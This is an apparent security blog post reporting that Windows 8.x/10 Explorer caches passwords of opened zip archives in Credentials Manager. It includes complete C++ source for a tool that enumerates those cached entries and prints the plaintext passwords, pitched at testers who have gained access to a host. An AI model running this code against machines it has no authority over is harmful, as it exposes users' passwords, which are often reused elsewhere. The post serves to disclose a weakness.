Credentials Manager – Zip Passwords Caching [Win8.x/10]

tl;dr: When you open a password protected zip archive using Windows Explorer (“Extract All…”), in Windows 8.x/10 the password is automatically cached in the Credentials Manager for the life of the logon session.

Long story…short

This doesn’t apply in earlier Windows versions (tested in Win 7), at least not by default, and it is apparently a ‘feature’ that aims to favor usability.

Ok, let me rephrase that…“if you have opened once a protected zip archive using Windows Explorer, then what the hell…, let me cache that password for you so you don’t need to enter it again during that logon session”. Holy crap!!!

If you share the same account on a Windows host with those versions of the OS installed and you open password-protected zip archives with (…ahem) sensitive data using Windows Explorer, then rest assured that, if you don’t logoff, anyone that is aware of this issue can easily get those passwords. So, you are basically fucked!

If you are an ethical hacker and you just gained access to a host running Windows 8.x/10, then you might get really lucky since people love re-using the same passwords for different things.
So, they are basically fucked!

 

w00t!

 

 

 

 

 

 

 

 

The code to do this, is ridiculously simple as well…

#include <Windows.h>
#include <wincred.h>
#include <iostream>

using namespace std;

/*
Credential Manager – Zip archives password retrieval for Win 8.x – Win 10
Author: kyREcon
*/

int main()
{

PCREDENTIALW * credBuf = NULL;

DWORD count;

CredEnumerateW(L”*.zip”, NULL, &count, &credBuf);

if (ERROR_NOT_FOUND == GetLastError())
{

wcout << endl << “No credentials found in the user’s credential set.” << endl;
goto __cleanup;

}

if (!credBuf)
{

wcout << endl << “Memory Allocation Failed!” << endl;
goto __cleanup;

}

for (DWORD i = 0; i < count; i++)
{

if (((*credBuf[i]).CredentialBlob) && ((*credBuf[i]).TargetName))
{

wcout << endl << “——————————————————” << endl;
wcout << “Target: ” << (wchar_t *)(*credBuf[i]).TargetName << endl << endl;
wcout << “Password: ” << (wchar_t *)(*credBuf[i]).CredentialBlob << endl;
wcout << “——————————————————” << endl << endl;

}

}

__cleanup:

if (credBuf)
{

CredFree(credBuf);
credBuf = NULL;

}

cin.get();
return 0;

}

Note: You can easily modify the source code to search for more stuff, but that’s out of scope for this article, and probably there are other tools that can get that extra stuff for you.
If you are aware of another tool that gathers cached zip passwords in Win 8.x/10 then let me know. In any case, nothing really fancy here, but you might find it occasionally useful.  ;0)

The above was tested in Windows 8.1 and 10, but it probably applies to Win 8 as well…

Download Tool & Source

Cheers,
kyREcon

Share